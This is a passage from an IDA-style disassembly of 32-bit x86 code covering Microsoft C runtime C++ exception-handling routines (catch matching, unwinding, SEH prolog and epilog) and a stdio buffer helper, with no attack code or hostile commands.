; sub_4186A0+D�j ...
xor eax, eax
inc eax
retn
sub_4186A0 endp
; =============== S U B R O U T I N E =======================================
sub_4186EF proc near ; CODE XREF: sub_41870D+76�p
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jz short loc_4186FC
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4186FC: ; CODE XREF: sub_4186EF+8�j
call sub_415456
and dword ptr [eax+80h], 0
jmp sub_418F0B
sub_4186EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41870D proc near ; CODE XREF: sub_41883D+117�p
; sub_418B60+31�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 10h
push offset stru_427EF8
call __SEH_prolog
mov ebx, [ebp+arg_0]
mov esi, [ebx+8]
mov [ebp+var_1C], esi
call sub_415456
add eax, 80h
inc dword ptr [eax]
and [ebp+ms_exc.disabled], 0
mov edi, [ebp+arg_8]
loc_418735: ; CODE XREF: sub_41870D+8F�j
cmp esi, [ebp+arg_C]
jz short loc_41879E
cmp esi, 0FFFFFFFFh
jle short loc_418744
cmp esi, [edi+4]
jl short loc_418749
loc_418744: ; CODE XREF: sub_41870D+30�j
call sub_418F40
loc_418749: ; CODE XREF: sub_41870D+35�j
mov eax, esi
shl eax, 3
mov ecx, [edi+8]
add ecx, eax
mov esi, [ecx]
mov [ebp+var_20], esi
mov [ebp+ms_exc.disabled], 1
cmp dword ptr [ecx+4], 0
jz short loc_41877A
mov [ebx+8], esi
push 103h
push ebx
mov ecx, [edi+8]
push dword ptr [ecx+eax+4]
call sub_418F70
loc_41877A: ; CODE XREF: sub_41870D+56�j
and [ebp+ms_exc.disabled], 0
jmp short loc_418799
; ---------------------------------------------------------------------------
loc_418780: ; DATA XREF: .rdata:00427F08�o
mov eax, [ebp+ms_exc.exc_ptr]
call sub_4186EF
retn
; ---------------------------------------------------------------------------
loc_418789: ; DATA XREF: .rdata:00427F0C�o
mov esp, [ebp+ms_exc.old_esp]
and [ebp+ms_exc.disabled], 0
mov edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov esi, [ebp+var_20]
loc_418799: ; CODE XREF: sub_41870D+71�j
mov [ebp+var_1C], esi
jmp short loc_418735
; ---------------------------------------------------------------------------
loc_41879E: ; CODE XREF: sub_41870D+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_4187C0
cmp esi, [ebp+arg_C]
jz short loc_4187B1
call sub_418F40
loc_4187B1: ; CODE XREF: sub_41870D+9D�j
mov [ebx+8], esi
call __SEH_epilog
retn
sub_41870D endp
; =============== S U B R O U T I N E =======================================
sub_4187BA proc near ; DATA XREF: .rdata:stru_427EF8�o
mov ebx, [ebp+8]
mov esi, [ebp-1Ch]
sub_4187BA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4187C0 proc near ; CODE XREF: sub_41870D+95�p
call sub_415456
cmp dword ptr [eax+80h], 0
jle short locret_4187DA
call sub_415456
add eax, 80h
dec dword ptr [eax]
locret_4187DA: ; CODE XREF: sub_4187C0+C�j
retn
sub_4187C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4187DB proc near ; CODE XREF: sub_418980+5C�p
; sub_418C87+1A8�p
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 8
push offset stru_427F10
call __SEH_prolog
mov eax, [ebp+arg_0]
test eax, eax
jz short loc_418809
mov ecx, [eax+1Ch]
mov ecx, [ecx+4]
test ecx, ecx
jz short loc_418809
and [ebp+ms_exc.disabled], 0
push ecx
push dword ptr [eax+18h]
call sub_413ACE
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_418809: ; CODE XREF: sub_4187DB+11�j
; sub_4187DB+1B�j
call __SEH_epilog
retn
sub_4187DB endp
; =============== S U B R O U T I N E =======================================
sub_41880F proc near ; DATA XREF: .rdata:stru_427F10�o
xor eax, eax
cmp [ebp+0Ch], al
setnz al
retn
sub_41880F endp
; ---------------------------------------------------------------------------
loc_418818: ; DATA XREF: .rdata:stru_427F10�o
mov esp, [ebp-18h]
jmp sub_418F0B
; =============== S U B R O U T I N E =======================================
sub_418820 proc near ; CODE XREF: sub_4189E4+7C�p
; sub_4189E4+FB�p ...
mov edx, [ecx+4]
push esi
mov esi, eax
mov eax, [ecx]
add eax, esi
test edx, edx
jl short loc_41883B
mov ecx, [ecx+8]
mov esi, [edx+esi]
mov ecx, [esi+ecx]
add ecx, edx
add eax, ecx
loc_41883B: ; CODE XREF: sub_418820+C�j
pop esi
retn
sub_418820 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41883D proc near ; CODE XREF: sub_418B60+52�p
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
; FUNCTION CHUNK AT 00418977 SIZE 00000003 BYTES
push 40h
push offset stru_427F20
call __SEH_prolog
mov ebx, ecx
mov edi, [ebp+arg_4]
mov esi, [ebp+arg_0]
mov [ebp+var_1C], ebx
and [ebp+var_20], 0
mov eax, [edi-4]
mov [ebp+var_24], eax
push dword ptr [esi+18h]
lea eax, [ebp+var_2C]
push eax
call sub_413C6C
pop ecx
pop ecx
mov [ebp+var_30], eax
call sub_415456
mov eax, [eax+78h]
mov [ebp+var_34], eax
call sub_415456
mov eax, [eax+7Ch]
mov [ebp+var_38], eax
call sub_415456
mov [eax+78h], esi
call sub_415456
mov ecx, [ebp+arg_8]
mov [eax+7Ch], ecx
and [ebp+ms_exc.disabled], 0
mov [ebp+ms_exc.disabled], 1
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+arg_C]
push edi
call sub_413D01
add esp, 14h
mov [ebp+var_1C], eax
and [ebp+ms_exc.disabled], 0
jmp loc_418965
; ---------------------------------------------------------------------------
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov [ebp+var_3C], eax
mov eax, [ebp+var_3C]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_4188FA
mov eax, [ebp+var_3C]
cmp dword ptr [eax+10h], 3
jnz short loc_4188FA
mov eax, [ebp+var_3C]
cmp dword ptr [eax+14h], 19930520h
jnz short loc_4188FA
mov eax, [ebp+var_3C]
cmp dword ptr [eax+1Ch], 0
mov [ebp+var_40], 1
jz short loc_418901
loc_4188FA: ; CODE XREF: sub_41883D+96�j
; sub_41883D+9F�j ...
mov [ebp+var_40], 0
loc_418901: ; CODE XREF: sub_41883D+BB�j
mov eax, [ebp+var_40]
retn
; ---------------------------------------------------------------------------
loc_418905: ; DATA XREF: .rdata:00427F34�o
mov esp, [ebp+ms_exc.old_esp]
mov ecx, [ebp+arg_C]
mov eax, [ecx+8]
mov [ebp+var_44], eax
mov edi, [ebp+arg_4]
mov eax, [edi+8]
mov [ebp+var_48], eax
mov edx, [ecx+10h]
mov [ebp+var_4C], edx
xor edx, edx
loc_418922: ; CODE XREF: sub_41883D+13B�j
mov [ebp+var_50], edx
cmp edx, [ecx+0Ch]
jnb short loc_41894E
lea esi, [edx+edx*4]
mov ebx, [ebp+var_4C]
lea esi, [ebx+esi*4]
mov ebx, [esi+4]
cmp eax, ebx
jle short loc_418977
cmp eax, [esi+8]
jg short loc_418977
lea eax, [ebx+1]
mov [ebp+var_48], eax
mov edx, [ebp+var_44]
mov eax, [edx+eax*8]
mov [ebp+var_48], eax
loc_41894E: ; CODE XREF: sub_41883D+EB�j
push eax
push ecx
xor esi, esi
push esi
push edi
call sub_41870D
add esp, 10h
mov [ebp+var_1C], esi
mov [ebp+ms_exc.disabled], esi
mov esi, [ebp+arg_0]
loc_418965: ; CODE XREF: sub_41883D+80�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_418980
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_41883D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41883D
loc_418977: ; CODE XREF: sub_41883D+FB�j
; sub_41883D+100�j
inc edx
jmp short loc_418922
; END OF FUNCTION CHUNK FOR sub_41883D
; =============== S U B R O U T I N E =======================================
sub_41897A proc near ; DATA XREF: .rdata:stru_427F20�o
mov edi, [ebp+0Ch]
mov esi, [ebp+8]
sub_41897A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_418980 proc near ; CODE XREF: sub_41883D+12C�p
mov eax, [ebp-24h]
mov [edi-4], eax
push dword ptr [ebp-30h]
call sub_413CB5
pop ecx
call sub_415456
mov ecx, [ebp-34h]
mov [eax+78h], ecx
call sub_415456
mov ecx, [ebp-38h]
mov [eax+7Ch], ecx
cmp dword ptr [esi], 0E06D7363h
jnz short locret_4189E3
cmp dword ptr [esi+10h], 3
jnz short locret_4189E3
cmp dword ptr [esi+14h], 19930520h
jnz short locret_4189E3
cmp dword ptr [ebp-20h], 0
jnz short locret_4189E3
cmp dword ptr [ebp-1Ch], 0
jz short locret_4189E3
push dword ptr [esi+18h]
call sub_413C94
pop ecx
test eax, eax
jz short locret_4189E3
call sub_413EAE
push eax
push esi
call sub_4187DB
pop ecx
pop ecx
locret_4189E3: ; CODE XREF: sub_418980+2B�j
; sub_418980+31�j ...
retn
sub_418980 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4189E4 proc near ; CODE XREF: sub_418B60+D�p
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 8
push offset stru_427F38
call __SEH_prolog
mov esi, ecx
mov eax, [ebp+arg_4]
mov edi, edx
mov ebx, [ebp+arg_0]
mov ecx, [eax+4]
test ecx, ecx
jz loc_418B4E
cmp byte ptr [ecx+8], 0
jz loc_418B4E
mov ecx, [eax+8]
test ecx, ecx
jnz short loc_418A20
test byte ptr [eax+3], 80h
jz loc_418B4E
loc_418A20: ; CODE XREF: sub_4189E4+30�j
mov eax, [eax]
test eax, eax
js short loc_418A2A
lea edi, [ecx+edi+0Ch]
loc_418A2A: ; CODE XREF: sub_4189E4+40�j
and [ebp+ms_exc.disabled], 0
push 1
push dword ptr [ebx+18h]
test al, 8
jz short loc_418A6C
call sub_41CDC5
pop ecx
pop ecx
test eax, eax
jz loc_418B45
push 1
push edi
call sub_41CDE1
pop ecx
pop ecx
test eax, eax
jz loc_418B45
mov eax, [ebx+18h]
mov [edi], eax
loc_418A5D: ; CODE XREF: sub_4189E4+D1�j
lea ecx, [esi+8]
call sub_418820
mov [edi], eax
jmp loc_418B4A
; ---------------------------------------------------------------------------
loc_418A6C: ; CODE XREF: sub_4189E4+51�j
test byte ptr [esi], 1
jz short loc_418AB7
call sub_41CDC5
pop ecx
pop ecx
test eax, eax
jz loc_418B45
push 1
push edi
call sub_41CDE1
pop ecx
pop ecx
test eax, eax
jz loc_418B45
push dword ptr [esi+14h]
push dword ptr [ebx+18h]
push edi
call sub_41BC70
add esp, 0Ch
cmp dword ptr [esi+14h], 4
jnz loc_418B4A
mov eax, [edi]
test eax, eax
jz loc_418B4A
jmp short loc_418A5D
; ---------------------------------------------------------------------------
loc_418AB7: ; CODE XREF: sub_4189E4+8B�j
cmp dword ptr [esi+18h], 0
jnz short loc_418AF0
call sub_41CDC5
pop ecx
pop ecx
test eax, eax
jz short loc_418B45
push 1
push edi
call sub_41CDE1
pop ecx
pop ecx
test eax, eax
jz short loc_418B45
push dword ptr [esi+14h]
lea ecx, [esi+8]
mov eax, [ebx+18h]
call sub_418820
push eax
push edi
call sub_41BC70
add esp, 0Ch
jmp short loc_418B4A
; ---------------------------------------------------------------------------
loc_418AF0: ; CODE XREF: sub_4189E4+D7�j
call sub_41CDC5
pop ecx
pop ecx
test eax, eax
jz short loc_418B45
push 1
push edi
call sub_41CDE1
pop ecx
pop ecx
test eax, eax
jz short loc_418B45
push dword ptr [esi+18h]
call sub_41CDFD
pop ecx
test eax, eax
jz short loc_418B45
mov eax, [ebx+18h]
lea ecx, [esi+8]
test byte ptr [esi], 4
jz short loc_418B34
push 1
call sub_418820
push eax
push dword ptr [esi+18h]
push edi
call sub_413ACE
jmp short loc_418B4A
; ---------------------------------------------------------------------------
loc_418B34: ; CODE XREF: sub_4189E4+13B�j
call sub_418820
push eax
push dword ptr [esi+18h]
push edi
call sub_413ACE
jmp short loc_418B4A
; ---------------------------------------------------------------------------
loc_418B45: ; CODE XREF: sub_4189E4+5C�j
; sub_4189E4+6E�j ...
call sub_418F40
loc_418B4A: ; CODE XREF: sub_4189E4+83�j
; sub_4189E4+C1�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_418B4E: ; CODE XREF: sub_4189E4+1B�j
; sub_4189E4+25�j ...
call __SEH_epilog
retn
sub_4189E4 endp
; =============== S U B R O U T I N E =======================================
sub_418B54 proc near ; DATA XREF: .rdata:stru_427F38�o
xor eax, eax
inc eax
retn
sub_418B54 endp
; ---------------------------------------------------------------------------
loc_418B58: ; DATA XREF: .rdata:stru_427F38�o
mov esp, [ebp-18h]
jmp sub_418F0B
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418B60 proc near ; CODE XREF: sub_418BC7+A2�p
; sub_418C87+17D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
test ecx, ecx
jz short loc_418B74
push ebx
push [ebp+arg_0]
mov edx, esi
call sub_4189E4
pop ecx
pop ecx
loc_418B74: ; CODE XREF: sub_418B60+5�j
cmp [ebp+arg_14], 0
push [ebp+arg_0]
jnz short loc_418B80
push esi
jmp short loc_418B83
; ---------------------------------------------------------------------------
loc_418B80: ; CODE XREF: sub_418B60+1B�j
push [ebp+arg_14]
loc_418B83: ; CODE XREF: sub_418B60+1E�j
call sub_413AD5
push dword ptr [edi]
push [ebp+arg_C]
push [ebp+arg_8]
push esi
call sub_41870D
mov eax, [edi+4]
push 100h
push [ebp+arg_10]
inc eax
push [ebp+arg_C]
mov [esi+8], eax
push [ebp+arg_4]
mov ecx, [ebx+0Ch]
push esi
push [ebp+arg_0]
call sub_41883D
add esp, 28h
test eax, eax
jz short loc_418BC5
push esi
push eax
call sub_413A9E
loc_418BC5: ; CODE XREF: sub_418B60+5C�j
pop ebp
retn
sub_418B60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418BC7 proc near ; CODE XREF: sub_418C87+1D3�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, [ebp+arg_0]
cmp dword ptr [esi], 80000003h
jz loc_418C84
call sub_415456
cmp dword ptr [eax+74h], 0
jz short loc_418C06
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_413D52
add esp, 1Ch
test eax, eax
jnz short loc_418C84
loc_418C06: ; CODE XREF: sub_418BC7+1E�j
mov esi, [ebp+arg_14]
push edi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push esi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_413BF2
mov edi, eax
mov eax, [ebp+var_4]
add esp, 14h
cmp eax, [ebp+var_8]
jnb short loc_418C83
push ebx
loc_418C2C: ; CODE XREF: sub_418BC7+B9�j
cmp esi, [edi]
jl short loc_418C74
cmp esi, [edi+4]
jg short loc_418C74
mov eax, [edi+0Ch]
mov ecx, [edi+10h]
shl eax, 4
add eax, ecx
mov ecx, [eax-0Ch]
test ecx, ecx
jz short loc_418C4D
cmp byte ptr [ecx+8], 0
jnz short loc_418C74
loc_418C4D: ; CODE XREF: sub_418BC7+7E�j
mov esi, [ebp+arg_4]
push 1
push [ebp+arg_1C]
lea ebx, [eax-10h]
push [ebp+arg_18]
xor ecx, ecx
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_0]
call sub_418B60
mov esi, [ebp+arg_14]
add esp, 1Ch
loc_418C74: ; CODE XREF: sub_418BC7+67�j
; sub_418BC7+6C�j ...
inc [ebp+var_4]
mov eax, [ebp+var_4]
add edi, 14h
cmp eax, [ebp+var_8]
jb short loc_418C2C
pop ebx
loc_418C83: ; CODE XREF: sub_418BC7+62�j
pop edi
loc_418C84: ; CODE XREF: sub_418BC7+F�j
; sub_418BC7+3D�j
pop esi
leave
retn
sub_418BC7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418C87 proc near ; CODE XREF: sub_418E69+93�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = byte ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 24h
mov eax, [ebp+arg_4]
mov eax, [eax+8]
and byte ptr [ebp+var_1C], 0
cmp eax, 0FFFFFFFFh
mov [ebp+var_18], eax
jl short loc_418CA7
mov ecx, [ebp+arg_10]
cmp eax, [ecx+4]
jl short loc_418CAC
loc_418CA7: ; CODE XREF: sub_418C87+16�j
call sub_418F40
loc_418CAC: ; CODE XREF: sub_418C87+1E�j
push ebx
mov ebx, [ebp+arg_0]
cmp dword ptr [ebx], 0E06D7363h
push esi
push edi
jnz loc_418E3E
cmp dword ptr [ebx+10h], 3
mov edi, 19930520h
jnz short loc_418D38
cmp [ebx+14h], edi
jnz short loc_418D38
cmp dword ptr [ebx+1Ch], 0
jnz short loc_418D38
call sub_415456
cmp dword ptr [eax+78h], 0
jz loc_418E36
call sub_415456
mov esi, [eax+78h]
mov [ebp+arg_0], esi
call sub_415456
mov eax, [eax+7Ch]
push 1
push esi
mov [ebp+arg_8], eax
mov byte ptr [ebp+var_1C], 1
call sub_41CDC5
test eax, eax
pop ecx
pop ecx
jnz short loc_418D10
call sub_418F40
loc_418D10: ; CODE XREF: sub_418C87+82�j
cmp dword ptr [esi], 0E06D7363h
jnz loc_418E3B
mov eax, [ebp+arg_0]
cmp dword ptr [eax+10h], 3
jnz short loc_418D35
cmp [eax+14h], edi
jnz short loc_418D35
cmp dword ptr [eax+1Ch], 0
jnz short loc_418D35
call sub_418F40
loc_418D35: ; CODE XREF: sub_418C87+9C�j
; sub_418C87+A1�j ...
mov ebx, [ebp+arg_0]
loc_418D38: ; CODE XREF: sub_418C87+40�j
; sub_418C87+45�j ...
cmp dword ptr [ebx], 0E06D7363h
jnz loc_418E3E
cmp dword ptr [ebx+10h], 3
jnz loc_418E3E
cmp [ebx+14h], edi
jnz loc_418E3E
mov esi, [ebp+var_18]
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_8]
push eax
push esi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_413BF2
mov ecx, [ebp+var_8]
add esp, 14h
cmp ecx, [ebp+var_20]
mov [ebp+var_4], eax
jnb loc_418E26
jmp short loc_418D85
; ---------------------------------------------------------------------------
loc_418D82: ; CODE XREF: sub_418C87+199�j
mov esi, [ebp+var_18]
loc_418D85: ; CODE XREF: sub_418C87+F9�j
cmp [eax], esi
jg loc_418E11
cmp esi, [eax+4]
jg short loc_418E11
mov ecx, [eax+0Ch]
test ecx, ecx
mov esi, [eax+10h]
mov [ebp+var_14], ecx
jle short loc_418E11
loc_418D9F: ; CODE XREF: sub_418C87+15B�j
mov ecx, [ebx+1Ch]
mov ecx, [ecx+0Ch]
lea edx, [ecx+4]
mov ecx, [ecx]
test ecx, ecx
mov [ebp+var_C], edx
mov [ebp+var_10], ecx
jle short loc_418DD8
loc_418DB4: ; CODE XREF: sub_418C87+14C�j
mov eax, [ebp+var_C]
mov edi, [eax]
push dword ptr [ebx+1Ch]
mov [ebp+var_24], edi
call sub_4186A0
test eax, eax
pop ecx
jnz short loc_418DE6
dec [ebp+var_10]
add [ebp+var_C], 4
cmp [ebp+var_10], eax
jg short loc_418DB4
mov eax, [ebp+var_4]
loc_418DD8: ; CODE XREF: sub_418C87+12B�j
dec [ebp+var_14]
add esi, 10h
cmp [ebp+var_14], 0
jg short loc_418D9F
jmp short loc_418E11
; ---------------------------------------------------------------------------
loc_418DE6: ; CODE XREF: sub_418C87+140�j
push [ebp+var_1C]
mov edi, [ebp+var_4]
push [ebp+arg_1C]
mov ecx, [ebp+var_24]
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push ebx
mov ebx, esi
mov esi, [ebp+arg_4]
call sub_418B60
mov ebx, [ebp+arg_0]
add esp, 1Ch
mov eax, edi
loc_418E11: ; CODE XREF: sub_418C87+100�j
; sub_418C87+109�j ...
inc [ebp+var_8]
mov ecx, [ebp+var_8]
add eax, 14h
cmp ecx, [ebp+var_20]
mov [ebp+var_4], eax
jb loc_418D82
loc_418E26: ; CODE XREF: sub_418C87+F3�j
cmp [ebp+arg_14], 0
jz short loc_418E36
push 1
push ebx
call sub_4187DB
pop ecx
pop ecx
loc_418E36: ; CODE XREF: sub_418C87+56�j
; sub_418C87+1A3�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_418E3B: ; CODE XREF: sub_418C87+8F�j
mov ebx, [ebp+arg_0]
loc_418E3E: ; CODE XREF: sub_418C87+31�j
; sub_418C87+B7�j ...
cmp [ebp+arg_14], 0
jnz short loc_418E64
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+var_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push ebx
call sub_418BC7
add esp, 20h
jmp short loc_418E36
; ---------------------------------------------------------------------------
loc_418E64: ; CODE XREF: sub_418C87+1BB�j
jmp sub_418F0B
sub_418C87 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418E69 proc near ; CODE XREF: .text:00413B48�p
; .text:00413B78�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_10]
mov eax, [esi]
push edi
and eax, 1FFFFFFFh
mov edi, 19930520h
cmp eax, edi
jz short loc_418E86
call sub_418F40
loc_418E86: ; CODE XREF: sub_418E69+16�j
mov eax, [ebp+arg_0]
test byte ptr [eax+4], 66h
jz short loc_418EAE
cmp dword ptr [esi+4], 0
jz short loc_418F04
cmp [ebp+arg_14], 0
jnz short loc_418F04
push 0FFFFFFFFh
push esi
push [ebp+arg_C]
push [ebp+arg_4]
call sub_41870D
add esp, 10h
jmp short loc_418F04
; ---------------------------------------------------------------------------
loc_418EAE: ; CODE XREF: sub_418E69+24�j
cmp dword ptr [esi+0Ch], 0
jz short loc_418F04
cmp dword ptr [eax], 0E06D7363h
jnz short loc_418EE8
cmp [eax+14h], edi
jbe short loc_418EE8
mov ecx, [eax+1Ch]
mov ecx, [ecx+8]
test ecx, ecx
jz short loc_418EE8
movzx edx, byte ptr [ebp+arg_1C]
push edx
push [ebp+arg_18]
push [ebp+arg_14]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call ecx
add esp, 20h
jmp short loc_418F07
; ---------------------------------------------------------------------------
loc_418EE8: ; CODE XREF: sub_418E69+51�j
; sub_418E69+56�j ...
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_1C]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call sub_418C87
add esp, 20h
loc_418F04: ; CODE XREF: sub_418E69+2A�j
; sub_418E69+30�j ...
xor eax, eax
inc eax
loc_418F07: ; CODE XREF: sub_418E69+7D�j
pop edi
pop esi
pop ebp
retn
sub_418E69 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418F0B proc near ; CODE XREF: sub_4186EF+19�j
; .text:0041881B�j ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0041CE15 SIZE 00000018 BYTES
push 8
push offset stru_427F48
call __SEH_prolog
call sub_415456
cmp dword ptr [eax+6Ch], 0
jz short loc_418F3B
and [ebp+ms_exc.disabled], 0
call sub_415456
call dword ptr [eax+6Ch]
jmp short loc_418F37
; ---------------------------------------------------------------------------
loc_418F30: ; DATA XREF: .rdata:stru_427F48�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_418F34: ; DATA XREF: .rdata:stru_427F48�o
mov esp, [ebp+ms_exc.old_esp]
loc_418F37: ; CODE XREF: sub_418F0B+23�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_418F3B: ; CODE XREF: sub_418F0B+15�j
jmp loc_41CE15
sub_418F0B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418F40 proc near ; CODE XREF: sub_413BF2+23�p
; sub_413BF2:loc_413C5C�p ...
ms_exc = CPPEH_RECORD ptr -18h
push 8
push offset stru_427F58
call __SEH_prolog
mov eax, off_42CE40
test eax, eax
jz short loc_418F68
and [ebp+ms_exc.disabled], 0
call eax ; sub_418F0B
jmp short loc_418F64
; ---------------------------------------------------------------------------
loc_418F5D: ; DATA XREF: .rdata:stru_427F58�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_418F61: ; DATA XREF: .rdata:stru_427F58�o
mov esp, [ebp+ms_exc.old_esp]
loc_418F64: ; CODE XREF: sub_418F40+1B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_418F68: ; CODE XREF: sub_418F40+13�j
jmp sub_418F0B
sub_418F40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418F70 proc near ; CODE XREF: sub_413D01+3D�p
; sub_41870D+68�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 4
push ebx
push ecx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebp
push [ebp+arg_8]
mov ecx, [ebp+arg_8]
mov ebp, [ebp+var_4]
call sub_413ED1
push esi
push edi
call eax
pop edi
pop esi
mov ebx, ebp
pop ebp
mov ecx, [ebp+arg_8]
push ebp
mov ebp, ebx
cmp ecx, 100h
jnz short loc_418FAF
mov ecx, 2
loc_418FAF: ; CODE XREF: sub_418F70+38�j
push ecx
call sub_413ED1
pop ebp
pop ecx
pop ebx
leave
retn 0Ch
sub_418F70 endp
; =============== S U B R O U T I N E =======================================
sub_418FBC proc near ; CODE XREF: sub_41414F+1E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+10h]
call sub_41AA50
test eax, eax
pop ecx
jz short loc_419040
cmp esi, offset dword_42C920
jnz short loc_418FDA
xor eax, eax
jmp short loc_418FE5
; ---------------------------------------------------------------------------
loc_418FDA: ; CODE XREF: sub_418FBC+18�j
cmp esi, offset dword_42C940
jnz short loc_419040
xor eax, eax
inc eax
loc_418FE5: ; CODE XREF: sub_418FBC+1C�j
inc dword_479EB8
test word ptr [esi+0Ch], 10Ch
jnz short loc_419040
push ebx
push edi
lea edi, ds:47A01Ch[eax*4]
cmp dword ptr [edi], 0
mov ebx, 1000h
jnz short loc_419026
push ebx
call sub_41344D
test eax, eax
pop ecx
mov [edi], eax
jnz short loc_419026
lea eax, [esi+14h]
push 2
mov [esi+8], eax
mov [esi], eax
pop eax
mov [esi+18h], eax
mov [esi+4], eax
jmp short loc_419033
; ---------------------------------------------------------------------------
loc_419026: ; CODE XREF: sub_418FBC+48�j
; sub_418FBC+55�j
mov edi, [edi]
mov [esi+8], edi
mov [esi], edi
mov [esi+18h], ebx
mov [esi+4], ebx
loc_419033: ; CODE XREF: sub_418FBC+68�j
or word ptr [esi+0Ch], 1102h
pop edi
xor eax, eax
pop ebx
inc eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_419040: ; CODE XREF: sub_418FBC+10�j
; sub_418FBC+24�j ...
xor eax, eax
pop esi
retn
sub_418FBC endp
; =============== S U B R O U T I N E =======================================
sub_419044 proc near ; CODE XREF: sub_41414F+3A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
jz short locret_41906D
push esi
mov esi, [esp+4+arg_4]
test byte ptr [esi+0Dh], 10h
jz short loc_41906C
push esi
call sub_41644D
